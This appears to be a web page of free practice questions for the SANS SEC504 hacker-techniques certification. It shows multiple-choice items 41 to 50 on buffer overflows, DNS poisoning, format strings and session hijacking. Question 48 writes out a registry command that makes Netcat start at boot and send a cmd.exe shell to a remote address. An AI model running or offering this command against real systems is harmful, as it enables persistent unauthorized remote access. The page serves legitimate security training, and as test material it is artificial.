Summer Special 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: bestdeal

Free SANS SEC504 Practice Exam with Questions & Answers | Set: 5

Questions 41

You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from which of the following?

Options:
A.

Brute force attack

B.

Mail bombing

C.

Distributed denial of service (DDOS) attack

D.

Malware installation from unknown Web sites

SANS SEC504 Premium Access
Questions 42

Which of the following statements about buffer overflow is true?

Options:
A.

It manages security credentials and public keys for message encryption.

B.

It is a collection of files used by Microsoft for software updates released between major service pack releases.

C.

It is a condition in which an application receives more data than it is configured to accept.

D.

It is a false warning about a virus.

Questions 43

In which of the following attacking methods does an attacker distribute incorrect IP address?

Options:
A.

IP spoofing

B.

Mac flooding

C.

DNS poisoning

D.

Man-in-the-middle

Questions 44

Jason, a Malicious Hacker, is a student of Baker university. He wants to perform remote hacking on the server of DataSoft Inc. to hone his hacking skills. The company has a Windows-based network. Jason successfully enters the target system remotely by using the advantage of vulnerability. He places a Trojan to maintain future access and then disconnects the remote session. The employees of the company complain to Mark, who works as a Professional Ethical Hacker for DataSoft Inc., that some computers are very slow. Mark diagnoses the network and finds that some irrelevant log files and signs of Trojans are present on the computers. He suspects that a malicious hacker has accessed the network. Mark takes the help from Forensic Investigators and catches Jason.

Which of the following mistakes made by Jason helped the Forensic Investigators catch him?

Options:
A.

Jason did not perform a vulnerability assessment.

B.

Jason did not perform OS fingerprinting.

C.

Jason did not perform foot printing.

D.

Jason did not perform covering tracks.

E.

Jason did not perform port scanning.

Questions 45

Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. His chooses to use printf(str) where he should have ideally used printf("%s", str).

What attack will his program expose the Web application to?

Options:
A.

Format string attack

B.

Cross Site Scripting attack

C.

SQL injection attack

D.

Sequence++ attack

Questions 46

Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?

Options:
A.

Win32/Agent

B.

WMA/TrojanDownloader.GetCodec

C.

Win32/Conflicker

D.

Win32/PSW.OnLineGames

Questions 47

Network mapping provides a security testing team with a blueprint of the organization. Which of the following steps is NOT a part of manual network mapping?

Options:
A.

Gathering private and public IP addresses

B.

Collecting employees information

C.

Banner grabbing

D.

Performing Neotracerouting

Questions 48

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"

What task do you want to perform by running this command?

Each correct answer represents a complete solution. Choose all that apply.

Options:
A.

You want to perform banner grabbing.

B.

You want to set the Netcat to execute command any time.

C.

You want to put Netcat in the stealth mode.

D.

You want to add the Netcat command to the Windows registry.

Questions 49

Which of the following statements are true about session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

Options:
A.

Use of a long random number or string as the session key reduces session hijacking.

B.

It is used to slow the working of victim's network resources.

C.

TCP session hijacking is when a hacker takes over a TCP session between two machines.

D.

It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

Questions 50

Which of the following types of attacks is the result of vulnerabilities in a program due to poor programming techniques?

Options:
A.

Evasion attack

B.

Denial-of-Service (DoS) attack

C.

Ping of death attack

D.

Buffer overflow attack

Exam Code: SEC504
Certification Provider: SANS
Exam Name: Hacker Tools, Techniques, Exploits and Incident Handling
Last Update: Sep 12, 2025
Questions: 328
SANS Free Access
Get SANS Full Access

SANS Free Exams
SANS Free Exams
Elevate your SANS exam preparation with free access to high-quality resources at Examstrack.